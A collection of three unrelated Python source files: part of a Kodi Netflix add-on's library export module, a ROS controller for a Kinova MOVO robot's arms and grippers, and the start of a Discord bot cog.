def episode_exists(self, title, season, episode):
"""Checks if an episode if a show is present in the local DB
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Episode of show exists in DB
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
if self.show_exists(title) is False:
return False
show_entry = self.db[self.series_label][title]
episode_entry = 'S%02dE%02d' % (season, episode)
return episode_entry in show_entry['episodes']
def add_movie(self, title, alt_title, year, video_id, build_url):
"""Adds a movie to the local db, generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
year : :obj:`int`
Release year of the show
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
folder = re.sub(r'[?|$|!|:|#]', r'', alt_title)
dirname = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, folder))
filename = os.path.join(dirname, movie_meta + '.strm')
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(650), movie_meta)
if xbmcvfs.exists(filename):
return
if not xbmcvfs.exists(dirname):
xbmcvfs.mkdirs(dirname)
if self.movie_exists(title=title, year=year) is False:
progress.update(50)
time.sleep(0.5)
self.db[self.movies_label][movie_meta] = {'alt_title': alt_title}
self._update_local_db(filename=self.db_filepath, db=self.db)
url = build_url({'action': 'play_video', 'video_id': video_id})
self.write_strm_file(path=filename, url=url, title_player=movie_meta)
progress.update(100)
time.sleep(1)
progress.close()
def add_show(self, netflix_id, title, alt_title, episodes, build_url,
in_background=False):
"""Adds a show to the local db, generates & persists the strm files
Note: Can also used to store complete seasons or single episodes,
it all depends on what is present in the episodes dictionary
Parameters
----------
title : :obj:`str`
Title of the show
alt_title : :obj:`str`
Alternative title given by the user
episodes : :obj:`dict` of :obj:`dict`
Episodes that need to be added
build_url : :obj:`fn`
Function to generate the stream url
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
show_meta = '%s' % (title)
folder = re.sub(r'[?|$|!|:|#]', r'', alt_title.encode('utf-8'))
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, folder))
progress = self._create_progress_dialog(in_background)
progress.create(self.kodi_helper.get_local_string(650), show_meta)
if not xbmcvfs.exists(show_dir):
self.log('Created show folder {}'.format(show_dir))
xbmcvfs.mkdirs(show_dir)
if self.show_exists(title) is False:
self.log('Show does not exists, adding entry to internal library')
self.db[self.series_label][show_meta] = {
'netflix_id': netflix_id,
'seasons': [],
'episodes': [],
'alt_title': alt_title}
else:
self.log('Show is present in internal library: {}'
.format(self.db[self.series_label][show_meta]))
if 'netflix_id' not in self.db[self.series_label][show_meta]:
self.db[self.series_label][show_meta]['netflix_id'] = netflix_id
self._update_local_db(filename=self.db_filepath, db=self.db)
self.log('Added missing netflix_id={} for {} to internal library.'
.format(netflix_id, title.encode('utf-8')),
xbmc.LOGNOTICE)
episodes = [episode for episode in episodes
if not self.episode_exists(title, episode['season'],
episode['episode'])]
self.log('Episodes to export: {}'.format(episodes))
if len(episodes) == 0:
self.log('No episodes to export, exiting')
return False
step = round(100.0 / len(episodes), 1)
percent = step
for episode in episodes:
desc = self.kodi_helper.get_local_string(20373) + ': '
desc += str(episode.get('season'))
long_desc = self.kodi_helper.get_local_string(20359) + ': '
long_desc += str(episode.get('episode'))
progress.update(
percent=int(percent),
line1=show_meta,
line2=desc,
line3=long_desc)
self._add_episode(
show_dir=show_dir,
title=title,
season=episode.get('season'),
episode=episode.get('episode'),
video_id=episode.get('id'),
build_url=build_url)
percent += step
time.sleep(0.05)
self._update_local_db(filename=self.db_filepath, db=self.db)
time.sleep(1)
progress.close()
if in_background:
self.kodi_helper.dialogs.show_episodes_added_notify(
title, len(episodes), self.kodi_helper.icon)
return show_dir
def _create_progress_dialog(self, is_noop):
if is_noop:
class NoopDialog():
def create(self, title, subtitle):
return noop()
def update(self, **kwargs):
return noop()
def close(self):
return noop()
return NoopDialog()
return xbmcgui.DialogProgress()
def _add_episode(self, title, show_dir, season, episode, video_id, build_url):
"""
Adds a single episode to the local DB,
generates & persists the strm file
Parameters
----------
title : :obj:`str`
Title of the show
show_dir : :obj:`str`
Directory that holds the stream files for that show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
video_id : :obj:`str`
ID of the video to be played
build_url : :obj:`fn`
Function to generate the stream url
"""
season = int(season)
episode = int(episode)
title = re.sub(r'[?|$|!|:|#]', r'', title)
self.log('Adding S{}E{} (id={}) of {} (dest={})'
.format(season, episode, video_id, title.encode('utf-8'),
show_dir))
# add season
if self.season_exists(title=title, season=season) is False:
self.log(
'Season {} does not exist, adding entry to internal library.'
.format(season))
self.db[self.series_label][title]['seasons'].append(season)
# add episode
episode_meta = 'S%02dE%02d' % (season, episode)
episode_exists = self.episode_exists(
title=title,
season=season,
episode=episode)
if episode_exists is False:
self.log(
'S{}E{} does not exist, adding entry to internal library.'
.format(season, episode))
self.db[self.series_label][title]['episodes'].append(episode_meta)
# create strm file
filename = episode_meta + '.strm'
filepath = os.path.join(show_dir, filename)
if xbmcvfs.exists(filepath):
self.log('strm file {} already exists, not writing it'
.format(filepath))
return
url = build_url({'action': 'play_video', 'video_id': video_id})
self.write_strm_file(
path=filepath,
url=url,
title_player=title + ' - ' + episode_meta)
def remove_movie(self, title, year):
"""Removes the DB entry & the strm file for the movie given
Parameters
----------
title : :obj:`str`
Title of the movie
year : :obj:`int`
Release year of the movie
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
movie_meta = '%s (%d)' % (title, year)
folder = re.sub(
pattern=r'[?|$|!|:|#]',
repl=r'',
string=self.db[self.movies_label][movie_meta]['alt_title'])
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(1210), movie_meta)
progress.update(50)
time.sleep(0.5)
del self.db[self.movies_label][movie_meta]
self._update_local_db(filename=self.db_filepath, db=self.db)
dirname = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, folder))
filename = os.path.join(self.movie_path, folder, movie_meta + '.strm')
if xbmcvfs.exists(dirname):
xbmcvfs.delete(filename)
xbmcvfs.rmdir(dirname)
return True
return False
time.sleep(1)
progress.close()
def remove_show(self, title):
"""Removes the DB entry & the strm files for the show given
Parameters
----------
title : :obj:`str`
Title of the show
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
label = self.series_label
rep_str = self.db[label][title]['alt_title'].encode('utf-8')
folder = re.sub(
pattern=r'[?|$|!|:|#]',
repl=r'',
string=rep_str)
progress = xbmcgui.DialogProgress()
progress.create(self.kodi_helper.get_local_string(1210), title)
time.sleep(0.5)
del self.db[self.series_label][title]
self._update_local_db(filename=self.db_filepath, db=self.db)
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, folder))
if xbmcvfs.exists(show_dir):
show_files = xbmcvfs.listdir(show_dir)[1]
episode_count_total = len(show_files)
step = round(100.0 / episode_count_total, 1)
percent = 100 - step
for filename in show_files:
progress.update(int(percent))
xbmcvfs.delete(os.path.join(show_dir, filename))
percent = percent - step
time.sleep(0.05)
xbmcvfs.rmdir(show_dir)
return True
return False
time.sleep(1)
progress.close()
def remove_season(self, title, season):
"""Removes the DB entry & the strm files for a season of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title.encode('utf-8'))
season = int(season)
season_list = []
episodes_list = []
show_meta = '%s' % (title)
for season_entry in self.db[self.series_label][show_meta]['seasons']:
if season_entry != season:
season_list.append(season_entry)
self.db[self.series_label][show_meta]['seasons'] = season_list
alt_title = self.db[self.series_label][show_meta]['alt_title']
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, alt_title))
if xbmcvfs.exists(show_dir):
show_files = [f for f in xbmcvfs.listdir(show_dir) if xbmcvfs.exists(os.path.join(show_dir, f))]
for filename in show_files:
if 'S%02dE' % (season) in filename:
xbmcvfs.delete(os.path.join(show_dir, filename))
else:
episodes_list.append(filename.replace('.strm', ''))
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def remove_episode(self, title, season, episode):
"""Removes the DB entry & the strm files for an episode of a show given
Parameters
----------
title : :obj:`str`
Title of the show
season : :obj:`int`
Season sequence number
episode : :obj:`int`
Episode sequence number
Returns
-------
bool
Delete successfull
"""
title = re.sub(r'[?|$|!|:|#]', r'', title.encode('utf-8'))
episodes_list = []
show_meta = '%s' % (title)
episode_meta = 'S%02dE%02d' % (season, episode)
alt_title = self.db[self.series_label][show_meta]['alt_title']
show_dir = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, alt_title))
if xbmcvfs.exists(os.path.join(show_dir, episode_meta + '.strm')):
xbmcvfs.delete(os.path.join(show_dir, episode_meta + '.strm'))
for episode_entry in self.db[self.series_label][show_meta]['episodes']:
if episode_meta != episode_entry:
episodes_list.append(episode_entry)
self.db[self.series_label][show_meta]['episodes'] = episodes_list
self._update_local_db(filename=self.db_filepath, db=self.db)
return True
def list_exported_media(self):
"""Return List of exported movies
Returns
-------
obj:`dict`
Contents of export folder
"""
movies = (['', ''])
shows = (['', ''])
movie_path = self.movie_path
tvshow_path = self.tvshow_path
if xbmcvfs.exists(self.nx_common.check_folder_path(movie_path)):
movies = xbmcvfs.listdir(movie_path)
if xbmcvfs.exists(self.nx_common.check_folder_path(tvshow_path)):
shows = xbmcvfs.listdir(tvshow_path)
return movies + shows
def list_exported_shows(self):
return self.db[self.series_label]
def get_exported_movie_year(self, title):
"""Return year of given exported movie
Returns
-------
obj:`int`
year of given movie
"""
year = '0000'
folder = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, title))
if xbmcvfs.exists(folder):
file = xbmcvfs.listdir(folder)
year = str(file[1]).split('(', 1)[1].split(')', 1)[0]
return int(year)
def updatedb_from_exported(self):
"""Adds movies and shows from exported media to the local db
Returns
-------
bool
Process finished
"""
tv_show_path = self.tvshow_path
db_filepath = self.db_filepath
if xbmcvfs.exists(self.nx_common.check_folder_path(self.movie_path)):
movies = xbmcvfs.listdir(self.movie_path)
for video in movies[0]:
folder = os.path.join(self.movie_path, video)
file = xbmcvfs.listdir(folder)
year = int(str(file[1]).split("(", 1)[1].split(")", 1)[0])
alt_title = unicode(video.decode('utf-8'))
title = unicode(video.decode('utf-8'))
movie_meta = '%s (%d)' % (title, year)
if self.movie_exists(title=title, year=year) is False:
self.db[self.movies_label][movie_meta] = {
'alt_title': alt_title}
self._update_local_db(filename=db_filepath, db=self.db)
if xbmcvfs.exists(self.nx_common.check_folder_path(tv_show_path)):
shows = xbmcvfs.listdir(tv_show_path)
for video in shows[0]:
show_dir = os.path.join(tv_show_path, video)
title = unicode(video.decode('utf-8'))
alt_title = unicode(video.decode('utf-8'))
show_meta = '%s' % (title)
if self.show_exists(title) is False:
self.db[self.series_label][show_meta] = {
'seasons': [],
'episodes': [],
'alt_title': alt_title}
episodes = xbmcvfs.listdir(show_dir)
for episode in episodes[1]:
file = str(episode).split(".")[0]
season = int(str(file).split("S")[1].split("E")[0])
episode = int(str(file).split("E")[1])
episode_meta = 'S%02dE%02d' % (season, episode)
episode_exists = self.episode_exists(
title=title,
season=season,
episode=episode)
if episode_exists is False:
self.db[self.series_label][title]['episodes'].append(episode_meta)
self._update_local_db(
filename=self.db_filepath,
db=self.db)
return True
def download_image_file(self, title, url):
"""Writes thumb image which is shown in exported
Parameters
----------
title : :obj:`str`
Filename based on title
url : :obj:`str`
Image url
Returns
-------
bool
Download triggered
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
imgfile = title + '.jpg'
file = os.path.join(self.imagecache_path, imgfile)
folder_movies = self.nx_common.check_folder_path(
path=os.path.join(self.movie_path, title))
folder_tvshows = self.nx_common.check_folder_path(
path=os.path.join(self.tvshow_path, title))
file_exists = xbmcvfs.exists(file)
folder_exists = xbmcvfs.exists(folder_movies)
tv_shows_folder = xbmcvfs.exists(folder_tvshows)
if not file_exists and (folder_exists or tv_shows_folder):
thread = threading.Thread(target=self.fetch_url, args=(url, file))
thread.start()
return True
def fetch_url(self, url, file):
f = xbmcvfs.File(file, 'wb')
f.write(requests.get(url).content)
f.write(url)
f.close()
def get_previewimage(self, title):
"""Load thumb image which is shown in exported
Parameters
----------
title : :obj:`str`
Filename based on title
url : :obj:`str`
Image url
Returns
-------
obj:`int`
image of given title if exists
"""
title = re.sub(r'[?|$|!|:|#]', r'', title)
imgfile = title + '.jpg'
file = os.path.join(self.imagecache_path, imgfile)
if xbmcvfs.exists(file):
return file
return ""
|
movo_arm_jtas.py | """--------------------------------------------------------------------
Copyright (c) 2017, Kinova Robotics inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
\file movo_arm_jtas.py
\brief This module offer an interface to control the movo arms
\Platform: Ubuntu 16.04 LTS / ROS Kinetic
--------------------------------------------------------------------"""
from movo_joint_interface.jaco_joint_controller import SIArmController
from trajectory_smoother import TrajectorySmoother
from moveit_python import MoveGroupInterface
from moveit_msgs.msg import MoveItErrorCodes
from control_msgs.msg import (
FollowJointTrajectoryAction,
FollowJointTrajectoryFeedback,
FollowJointTrajectoryResult,
GripperCommandAction,
GripperCommandFeedback,
GripperCommandResult,
)
from trajectory_msgs.msg import JointTrajectoryPoint
from std_msgs.msg import UInt16,Bool
from movo_msgs.msg import Status
from threading import Thread
import errno
import math
import rospy
import actionlib
import bisect
import operator
from copy import deepcopy
def calc_grip_dist(b):
l1 = 30.9476-87.0932*math.sin(b[0]-0.627445866)
l2 = 30.9476-87.0932*math.sin(b[1]-0.627445866)
dist = l1+l2
if (dist < (2*30.9476)):
dist-=17.0
else:
dist+=1.08
return (dist * 0.001)
def calc_grip_angle(x):
dist = x*1000.0
tmp = (0.5*dist-30.9476)/-87.0932
a = math.asin(tmp)+0.627445866
if (0.5*dist > 30.9476):
a+=0.00599
else:
a-=0.1
return (a)
class MovoArmJTAS(object):
def __init__(self, prefix="", gripper="", interface='eth0', jaco_ip="10.66.171.15", dof="", rate=100.0):
self._alive = False
self.init_success = True
self._action_name = rospy.get_name()
self._prefix = prefix
# Action Feedback/Result
if ("kg2" == gripper) or ("rq85" == gripper):
self.gripper_stall_force = 20.0
self.gripper_dead_zone = 0.01
elif("kg3" == gripper):
self.gripper_stall_force = 30.0
self.gripper_dead_zone = 0.01
self._last_gripper_pos = 0.165
self._gripper_stall_to = 0.7
self._gripper_pos_stall = False
self._last_movement_time = rospy.get_time()
self.dof = dof
self._planner_homing = False
"""
Define the joint names
"""
if ("6dof" == dof):
self._joint_names = [self._prefix+'_shoulder_pan_joint',
self._prefix+'_shoulder_lift_joint',
self._prefix+'_elbow_joint',
self._prefix+'_wrist_1_joint',
self._prefix+'_wrist_2_joint',
self._prefix+'_wrist_3_joint']
self._body_joints = ["right_elbow_joint",
"right_shoulder_lift_joint",
"right_shoulder_pan_joint",
"right_wrist_1_joint",
"right_wrist_2_joint",
"right_wrist_3_joint",
"left_elbow_joint",
"left_shoulder_lift_joint",
"left_shoulder_pan_joint",
"left_wrist_1_joint",
"left_wrist_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-2.135, -0.227, -1.478, -2.083, 1.445, 1.321, 2.135, 0.227, 1.478, 2.083, -1.445, -1.321, 0.25, 0.0, 0.0]
elif ("7dof" == dof):
self._joint_names = [self._prefix + '_shoulder_pan_joint',
self._prefix + '_shoulder_lift_joint',
self._prefix + '_arm_half_joint',
self._prefix + '_elbow_joint',
self._prefix + '_wrist_spherical_1_joint',
self._prefix + '_wrist_spherical_2_joint',
self._prefix + '_wrist_3_joint']
self._body_joints = ["right_shoulder_pan_joint",
"right_shoulder_lift_joint",
"right_arm_half_joint",
"right_elbow_joint",
"right_wrist_spherical_1_joint",
"right_wrist_spherical_2_joint",
"right_wrist_3_joint",
"left_shoulder_pan_joint",
"left_shoulder_lift_joint",
"left_arm_half_joint",
"left_elbow_joint",
"left_wrist_spherical_1_joint",
"left_wrist_spherical_2_joint",
"left_wrist_3_joint",
"linear_joint",
"pan_joint",
"tilt_joint"]
self._homed = [-1.5, -0.2, -0.15, -2.0, 2.0, -1.24, -1.1, 1.5, 0.2, 0.15, 2.0, -2.0, 1.24, 1.1, 0.25, 0, 0]
else:
rospy.logerr("DoF needs to be set 6 or 7, cannot start MovoArmJTAS")
return
"""
Controller parameters from arguments, messages, and dynamic
reconfigure
"""
self._trajectory_control_rate = rate # Hz
self._goal_time = 0.0
self._stopped_velocity = 0.0
self._goal_error = dict()
self._path_thresh = dict()
self._traj_smoother = TrajectorySmoother(rospy.get_name(),self._prefix)
self._ctl = SIArmController(self._prefix,gripper,interface,jaco_ip, dof)
self._ctl.Pause()
self._estop_delay = 0
self.home_arm_sub = rospy.Subscriber('/movo/home_arms', Bool, self._home_arms)
self.home_arm_pub = rospy.Publisher('/movo/arms_are_homed', Bool, queue_size=1)
self._arms_homing = False
if not self._ctl.init_success:
rospy.logerr("Failed to initialize controller, make sure the serial number exists")
self.clean_shutdown()
self.init_success = False
return
self.estop = False
self._fdbk = FollowJointTrajectoryFeedback()
self._result = FollowJointTrajectoryResult()
#self._dyn = reconfig_server
self._ns = '/movo/%s_arm_controller'%self._prefix
self._fjt_ns = self._ns + '/follow_joint_trajectory'
self._server = actionlib.SimpleActionServer(
self._fjt_ns,
FollowJointTrajectoryAction,
execute_cb=self._on_trajectory_action,
auto_start=False)
self._alive = True
self._movo_status_sub = rospy.Subscriber("/movo/feedback/status",Status,self._update_movo_status)
self._server.start()
# Action Server
self._gripper_server = actionlib.SimpleActionServer(
'/movo/%s_gripper_controller/gripper_cmd'%self._prefix,
GripperCommandAction,
execute_cb=self._on_gripper_action,
auto_start=False)
self._gripper_server.start()
self._gripper_action_name = '/movo/%s_gripper_controller/gripper_cmd'%self._prefix
# Action Feedback/Result
self._gripper_fdbk = GripperCommandFeedback()
self._gripper_result = GripperCommandResult()
self._gripper_timeout = 6.0
self._ctl.api.InitFingers()
def _home_arm_planner(self):
if self._prefix == 'left':
rospy.sleep(5)
else:
move_group_jtas = MoveGroupInterface("upper_body", "base_link")
move_group_jtas.setPlannerId("RRTConnectkConfigDefault")
success = False
while not rospy.is_shutdown() and not success:
result = move_group_jtas.moveToJointPosition(self._body_joints, self._homed, 0.05)
if result.error_code.val == MoveItErrorCodes.SUCCESS:
rospy.logerr("_home_arm_planner completed ")
success = True
else:
rospy.logerr("_home_arm_planner: _home_arm_planner failed (%d)" % result.error_code.val)
self._arms_homing = True
self._ctl.api.MoveHome()
self._ctl.api.InitFingers()
self.home_arm_pub.publish(Bool(True))
rospy.sleep(2.0)
self._arms_homing = False
self._planner_homing = False
def _update_gripper_feedback(self, position):
tmp = self._ctl.GetGripperFdbk()
grip_dist = calc_grip_dist(tmp[0])
self._gripper_fdbk.position = grip_dist
self._gripper_fdbk.effort = sum(tmp[2])
self._gripper_fdbk.stalled = (self._gripper_fdbk.effort >
self.gripper_stall_force)
self._gripper_fdbk.reached_goal = (math.fabs(grip_dist -
position) <
self.gripper_dead_zone)
delta = math.fabs(self._gripper_fdbk.position - self._last_gripper_pos)
self._last_gripper_pos = self._gripper_fdbk.position
if (delta > 0.005):
self._last_movement_time = rospy.get_time()
if (rospy.get_time() - self._last_movement_time) > self._gripper_stall_to:
self._gripper_pos_stall=True
else:
self._gripper_pos_stall=False
self._gripper_fdbk.stalled |= self._gripper_pos_stall
self._gripper_result = self._gripper_fdbk
self._gripper_server.publish_feedback(self._gripper_fdbk)
def _command_gripper(self, position):
ang = calc_grip_angle(position)
self._ctl.CommandGripper(ang)
def _check_gripper_state(self):
return (self._gripper_fdbk.stalled or self._gripper_fdbk.reached_goal)
def _on_gripper_action(self, goal):
# Store position and effort from call
# Position to 0:0.165 == close:open
position = goal.command.position
effort = goal.command.max_effort
print position
# Reset feedback/result
self._update_gripper_feedback(position)
# 20 Hz gripper state rate
control_rate = rospy.Rate(20.0)
# Record start time
start_time = rospy.get_time()
self._ctl.Resume()
def now_from_start(start):
return rospy.get_time() - start
# Continue commanding goal until success or timeout
self._last_movement_time = rospy.get_time()
self._last_gripper_pos = self._gripper_fdbk.position
while ((now_from_start(start_time) < self._gripper_timeout or
self._gripper_timeout < 0.0) and not rospy.is_shutdown()):
if self._gripper_server.is_preempt_requested():
self._ctl.StopGripper()
rospy.loginfo("%s: Gripper Action Preempted" %
(self._gripper_action_name,))
self._gripper_server.set_preempted(self._gripper_result)
return
self._update_gripper_feedback(position)
if self._check_gripper_state():
self._gripper_server.set_succeeded(self._gripper_result)
return
self._command_gripper(position)
control_rate.sleep()
# Gripper failed to achieve goal before timeout/shutdown
self._ctl.StopGripper()
if not rospy.is_shutdown():
rospy.logerr("%s: Gripper Command Not Achieved in Allotted Time" %
(self._gripper_action_name,))
self._update_gripper_feedback(position)
self._gripper_server.set_aborted(self._gripper_result)
def _home_arms(self,cmd):
if (True == cmd.data and self._planner_homing == False):
self._planner_homing = True
b_thread = Thread(target=self._home_arm_planner(), args='')
b_thread.daemon = True
b_thread.start()
def _update_movo_status(self,status):
if (0 != status.dynamic_response) or (False == self._ctl.GetCtlStatus()) or self._arms_homing:
self.estop = True
self._ctl.SetEstop()
self._estop_delay = 100
else:
if (0 == self._estop_delay):
self.estop = False
self._ctl.ClearEstop()
else:
self.estop = True
self._ctl.SetEstop()
self._estop_delay -= 1
def robot_is_enabled(self):
return not self.estop
def clean_shutdown(self):
self._ctl.Stop()
self._alive = False
def _get_trajectory_parameters(self, joint_names, goal):
"""
For each input trajectory, if path, goal, or goal_time tolerances
provided, we will use these as opposed to reading from the
parameter server/dynamic reconfigure
"""
"""
Goal time tolerance - time buffer allowing goal constraints to be met
"""
if goal.goal_time_tolerance:
self._goal_time = goal.goal_time_tolerance.to_sec()
else:
self._goal_time = 1.0
"""
Stopped velocity tolerance - max velocity at end of execution
"""
self._stopped_velocity = 0.5
"""
Path execution and goal tolerances per joint
"""
for jnt in joint_names:
if jnt not in self._joint_names:
rospy.logerr(
"%s: Trajectory Aborted - Provided Invalid Joint Name %s" %
(self._action_name, jnt,))
self._result.error_code = self._result.INVALID_JOINTS
self._server.set_aborted(self._result)
return
"""
Path execution tolerance
"""
self._path_thresh[jnt] = 0.5
if goal.path_tolerance:
for tolerance in goal.path_tolerance:
if jnt == tolerance.name:
self._path_thresh[jnt] = tolerance.position
"""
Goal error tolerance
"""
self._goal_error[jnt] = 0.5
if goal.goal_tolerance:
for tolerance in goal.goal_tolerance:
if jnt == tolerance.name:
self._goal_error[jnt] = tolerance.position
def _get_current_position(self, joint_names):
return self._ctl.GetCurrentJointPosition(joint_names)
def _get_current_velocities(self, joint_names):
return self._ctl.GetCurrentJointVelocity(joint_names)
def _get_current_errors(self, joint_names):
error = self._ctl.GetCurrentJointPositionError(joint_names)
return zip(joint_names, error)
def _update_feedback(self, cmd_point, joint_names, cur_time):
self._fdbk.header.stamp = rospy.Duration.from_sec(rospy.get_time())
self._fdbk.joint_names = joint_names
self._fdbk.desired = cmd_point
self._fdbk.desired.time_from_start = rospy.Duration.from_sec(cur_time)
self._fdbk.actual.positions = self._get_current_position(joint_names)
self._fdbk.actual.time_from_start = rospy.Duration.from_sec(cur_time)
self._fdbk.error.positions = map(operator.sub,
self._fdbk.desired.positions,
self._fdbk.actual.positions
)
self._fdbk.error.time_from_start = rospy.Duration.from_sec(cur_time)
self._server.publish_feedback(self._fdbk)
def _command_stop(self):
self._ctl.SetPositionHold()
self._ctl.ClearPositionHold()
def _command_joints(self, joint_names, point, dimensions_dict):
if self._server.is_preempt_requested() or not self.robot_is_enabled():
rospy.loginfo("%s: Trajectory Preempted" % (self._action_name,))
self._server.set_preempted()
self._command_stop()
return False
deltas = self._get_current_errors(joint_names)
for delta in deltas:
if ((math.fabs(delta[1]) >= self._path_thresh[delta[0]]
and self._path_thresh[delta[0]] >= 0.0)) or not self.robot_is_enabled():
rospy.logerr("%s: Exceeded Error Threshold on %s: %s" %
(self._action_name, delta[0], str(delta[1]),))
self._result.error_code = self._result.PATH_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
return False
pos = dict(zip(joint_names, point.positions))
vel = dict(zip(joint_names, [0.0]*len(joint_names)))
acc = dict(zip(joint_names, [0.0]*len(joint_names)))
if dimensions_dict['velocities']:
vel = dict(zip(joint_names, point.velocities))
if dimensions_dict['accelerations']:
acc = dict(zip(joint_names, point.accelerations))
if self._alive:
self._ctl.CommandJoints(pos, vel, acc)
return True
def _check_goal_state(self, joint_names, last):
for error in self._get_current_errors(joint_names):
if (self._goal_error[error[0]] > 0
and self._goal_error[error[0]] < math.fabs(error[1])):
return error[0]
if (self._stopped_velocity > 0.0 and
max([abs(cur_vel) for cur_vel in self._get_current_velocities(joint_names)]) >
self._stopped_velocity):
return False
else:
return True
def _on_trajectory_action(self, goal):
joint_names = goal.trajectory.joint_names
self._get_trajectory_parameters(joint_names, goal)
success,results = self._traj_smoother.ProcessTrajectory(goal.trajectory,
self._get_current_position(joint_names),
False)
if not success:
self._server.set_aborted()
return
"""
Copy the results to variables that make sense namewise
"""
dimensions_dict = results[0]
b_matrix = results[1]
trajectory_points = results[2]
pnt_times = results[3]
num_points = results[4]
"""
Wait for the specified execution time, if not provided use now
"""
start_time = goal.trajectory.header.stamp.to_sec()
now = rospy.get_time()
if start_time == 0.0:
start_time = rospy.get_time()
while start_time > now:
now = rospy.get_time()
"""
Loop until end of trajectory time. Provide a single time step
of the control rate past the end to ensure we get to the end.
Keep track of current indices for spline segment generation
"""
self._ctl.Resume()
control_rate = rospy.Rate(self._trajectory_control_rate)
now_from_start = rospy.get_time() - start_time
end_time = trajectory_points[-1].time_from_start.to_sec()
while (now_from_start < end_time and not rospy.is_shutdown() and
self.robot_is_enabled()):
now = rospy.get_time()
now_from_start = now - start_time
idx = bisect.bisect(pnt_times, now_from_start)
"""
Calculate percentage of time passed in this interval
"""
if idx >= num_points:
cmd_time = now_from_start - pnt_times[-1]
t = 1.0
elif idx >= 0:
cmd_time = (now_from_start - pnt_times[idx-1])
t = cmd_time / (pnt_times[idx] - pnt_times[idx-1])
else:
cmd_time = 0.0
t = 0.0
point = self._traj_smoother.GetBezierPoint(b_matrix,
idx,
t,
cmd_time,
dimensions_dict)
"""
Command Joint Position, Velocity, Acceleration
"""
command_executed = self._command_joints(joint_names, point, dimensions_dict)
self._update_feedback(deepcopy(point), joint_names, now_from_start)
"""
Break the loop if the command cannot be executed
"""
if not command_executed:
return
control_rate.sleep()
"""
Keep trying to meet goal until goal_time constraint expired
"""
last = trajectory_points[-1]
last_time = trajectory_points[-1].time_from_start.to_sec()
end_angles = dict(zip(joint_names, last.positions))
while (now_from_start < (last_time + self._goal_time)
and not rospy.is_shutdown() and self.robot_is_enabled()):
if not self._command_joints(joint_names, last, dimensions_dict):
return
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
control_rate.sleep()
now_from_start = rospy.get_time() - start_time
self._update_feedback(deepcopy(last), joint_names,
now_from_start)
"""
Verify goal constraint
"""
result = self._check_goal_state(joint_names, last)
if result is True:
rospy.loginfo("%s: Joint Trajectory Action Succeeded for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.SUCCESSFUL
self._server.set_succeeded(self._result)
elif result is False:
rospy.logerr("%s: Exceeded Max Goal Velocity Threshold for %s arm" %
(self._action_name, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
else:
rospy.logerr("%s: Exceeded Goal Threshold Error %s for %s arm" %
(self._action_name, result, self._prefix))
self._result.error_code = self._result.GOAL_TOLERANCE_VIOLATED
self._server.set_aborted(self._result)
self._command_stop()
self._ctl.Pause()
|
coglib.py | import json
from threading import Thread
from typing import Optional, Callable, Union
from discord.ext.commands import Context
from discord_slash import SlashContext
from flask import Flask, jsonify, request, Response
from requests import post
from .classes import CogPlus, BotPlus
from .database.translation import Translation
from .errors import InteractionError, UnexpectedError
from .extra import __agent__
from .task import TaskPlus
class API(CogPlus):
def __init__(self, bot: BotPlus, import_name, **kwargs):
super().__init__(bot)
